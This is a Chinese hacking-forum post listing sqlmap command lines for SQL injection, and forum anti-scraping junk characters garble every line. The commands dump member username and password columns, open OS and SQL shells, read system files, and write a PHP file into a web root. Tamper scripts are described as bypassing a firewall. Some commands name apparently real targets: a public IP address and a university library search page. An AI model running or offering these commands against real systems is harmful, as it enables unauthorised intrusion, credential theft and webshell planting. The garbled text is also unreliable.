找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1861|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
/pentest/database/sqlmap5 q2 ]$ l' N$ L& I+ }7 `

' ]* V2 g" W# ]1 v" C6 Dupdate :::::>     in the folder   after  execute    following   order : svn update
6 r- V4 U8 x4 C. N0 ]$ n8 L0 ^3 H2 R  y
sqlmap.py -r 1.txt --current-db
) \. o# Z% \6 t, Q. q' }2 ?2 M/ i+ @5 T; ~, W3 p8 D& G
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
7 H  x! ?- T& l( f$ L3 q9 h5 V8 u4 b; C
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
, D( Q" M1 Z+ H( x6 i: h& z猜解数据库
5 b. P; f. z) H( a./sqlmap.py -u "injection-url" --dbs+ ?. R1 \% w; z  g" _5 d2 ~
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
% y+ _0 f- d( |& U" ?/ I5 h8 W6 }6 D; S) {" z. p: w3 o1 o1 X
猜解表名
/ H8 f3 {" y' a& h% x7 _./sqlmap.py -u "injection-url" -D database_name --tables1 {! e' r( S8 }8 q$ m
3 D& |# Y3 s: C. T
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
# ?. E5 X: ?3 \' i0 y1 xsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
( L: \. f& x, z; }: O2 E# L9 ~0 H. \, [! L+ s
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
' H$ E4 a$ M* c! Y4 C/ {
6 `$ E3 R$ `: L, Z7 [4 C& w6 msqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"( p. d" u1 D/ z# u1 j
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"5 ~# w: R& K+ Z! e
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
# L4 ^$ P; `6 X# }; @7 x8 Vsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"' ~/ a6 w; A9 @. x- Y( _
, @4 B$ i0 p5 S7 r3 j4 f
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py". H. ~5 |. Q$ g" c: Y9 d
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
8 D0 A1 y4 d* R9 {9 F4 gsqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"4 \. n. a& I/ A  l( U5 z( I
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
+ |2 m& c; Q) s$ y0 y1 `" Y% Fsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump; [- j7 U2 d7 R7 l& T$ w7 S
4 I& Q+ @0 {7 d
sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了' I& k! m$ v& _+ D8 _8 u( D# }
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
4 k3 g: _2 {6 _( l. {, j. p
% c/ N. n- Z: }) u  nsqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"  o2 V* P9 S9 G6 z1 a) A
猜解列名
2 C0 B3 _8 R8 S) _: F! g2 P./sqlmap.py -u "injection-url" -D database_name -T table_name --columns; j3 c+ m* h! u& I

3 F8 F# |3 t1 F9 [sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" . w7 [2 G* H* r' U! C- g: T
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
3 ]1 k9 h3 o; `" |' e+ ?2 W* u7 h3 Ysqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
5 A: S3 X& a2 e1 `* j. p# a/ W9 z7 A$ r# A) f: y* W9 p% |
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"% t$ v& y+ `. j- c
&submit=Go
1 x+ ~( g6 k3 {4 Y猜解值- }: i+ z1 r' |5 c# M* _
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
+ {8 N9 j  z3 r4 `! [0 M/ K+ B========================================================
& e- t5 F2 z  \+ q* n- H( z6 s) F搜索表名中包括mana字符的
; z# g6 Z4 P) ]. x' o/sqlmap.py -u "injection-url" -T mana --search0 a2 y+ }) |' C6 W  w
返回一个交互式sql shell& X* i6 O0 s& U' R" H" P
/sqlmap.py -u "injection-url" --sql-shell( O  J/ Z7 ]+ i9 S
读取指定文件(需权限)
  S% ]9 F1 y, `$ f6 s' Q/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
+ X4 \9 [! E) D+ i2 J3 E- a查看当前 用户 及 数据库 ; q8 ]2 h7 H& y: M7 G
/sqlmap.py -u "injection-url" --current-user --current-db$ Z0 ^' B& A9 m. p4 m$ P% ?
本地文件 写入 远程目标绝对路径3 ^  o0 B+ ^% y7 H2 ?$ k
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径9 H: ]5 R' c9 v" M5 ]! a9 E
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" / r& J4 @' f/ ?. n+ y! [- v

. x3 s* p6 p% ^7 `/ d6 t- E* P* Hsqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
6 L- }. t4 K! B  U! M3 N  K) e查看某用的权限3 l' G( T# u9 T6 i( N) H
/sqlmap.py -u "injection-url" --privileges -U root' m: `- V* I( `
查看当前用户是否为dba* M( s6 y3 _5 k
/sqlmap.py -u "injection-url" --is-dba
8 F/ K5 `' r0 x1 f读取所有数据库用户或指定数据库用户的密码
2 s/ W' W" Y! b0 g$ ?2 asqlmap.py -r 1.txt --users --passwords
, Y( M/ u! t  z: C' O5 V/ o9 g; c& }sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
# Q5 s4 O3 I; p' g9 _. L+ |6 h9 @# [6 D3 O" F3 y6 `# Y
/sqlmap.py -u "injection-url" --passwords -U root
/ T6 v2 N, \6 G* S) p
9 q" V, @5 B5 V& q7 \9 J+ m( e--start&&--stop 与 --first&&--last 的区别. j( t/ P+ S, E! P5 N0 l
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)! A( B5 O* z1 @: a% r' K0 [

- {7 _6 e! s% ^0 E# K+ s从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)+ k# L4 m2 @; w3 ~! k$ r
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables4 ^* g8 T, R$ h, [
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns; x, T! ?2 O" Q8 s$ W4 w9 G

$ F8 E6 i, n; ]* R+ P4 z执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)9 i* M3 f0 x. S4 ?1 y1 d' x
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
* C/ Y6 o6 a) i: ~0 R+ P
' V$ d$ k- @* u; e6 e6 R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表